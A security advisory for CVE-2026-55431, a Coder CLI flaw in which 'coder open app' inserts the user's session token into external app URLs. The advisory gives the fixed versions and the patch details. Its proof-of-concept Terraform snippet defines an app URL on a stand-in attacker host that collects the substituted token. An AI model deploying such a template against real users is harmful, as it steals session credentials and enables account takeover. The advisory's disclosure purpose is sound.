high · 7.7CVE-2026-55431Jul 6, 2026

CVE-2026-55431: Coder CLI Session Token Exfiltration via External App URLs

Rohit Hatagale
AI Security Researcher, SecureLayer7

A malicious Coder workspace template can register an external app whose URL contains the $SESSION_TOKEN placeholder, causing the CLI to send the user's live session token to an attacker-controlled ser

Packagegithub.com/coder/coder/v2
Ecosystemgo
Affected>= 2.34.0, < 2.34.2
Fixed in2.34.2

The problem

The `coder open app` CLI command opens external workspace-app URLs without validating the scheme or destination host. Before handing the URL to the OS, it performs a literal string substitution of `$SESSION_TOKEN` with the caller's real session token.

Any attacker who controls a workspace template can define an external app URL pointing to an arbitrary host, including a plaintext HTTP endpoint or a non-browser URI scheme handler. When a victim runs `coder open app` against that workspace, their session token is exfiltrated and the attacker gains full account access for the token's lifetime.

Proof of concept

A working proof-of-concept for CVE-2026-55431 in github.com/coder/coder/v2, with the exact payload below.

bash
# Malicious Terraform template snippet (attacker-controlled workspace)
resource "coder_app" "steal_token" {
  agent_id    = coder_agent.main.id
  slug        = "steal"
  display_name = "Open Docs"
  url         = "https://attacker.example/collect?t=$SESSION_TOKEN"
  external    = true
}

# Victim runs:
coder open app <workspace> steal
# CLI substitutes $SESSION_TOKEN -> real token, then opens:
# https://attacker.example/collect?t=<SESSION_TOKEN>

The root cause is twofold: no URL-scheme allowlist and unconditional `$SESSION_TOKEN` substitution regardless of destination host. Pre-patch, the CLI performed a naive `strings.Replace(appURL, "$SESSION_TOKEN", token, -1)` before passing the result to the OS open handler, with no check that the URL scheme was `https` or that the host matched the Coder deployment.

The patch (PR #26146, by @zedkipp) adds a scheme allowlist (`https` only, blocking `http`, `file`, custom URI schemes, etc.) and gates `$SESSION_TOKEN` substitution so it is only performed when the destination host matches the trusted Coder web frontend origin.

This directly closes both CWE-522 (Insufficiently Protected Credentials) and CWE-601 (Open Redirect).

The fix

Upgrade to Coder v2.34.2 (or the backport for your release line: v2.33.8, v2.32.7, v2.29.17). The patch enforces a URL-scheme allowlist and restricts session-token substitution to trusted Coder-controlled origins. As a short-term workaround, avoid running `coder open app` against workspaces from untrusted or third-party template authors.

Reported by Anthropic Security Team (ANT-2026-22457).

References: [1][2][3]

Related research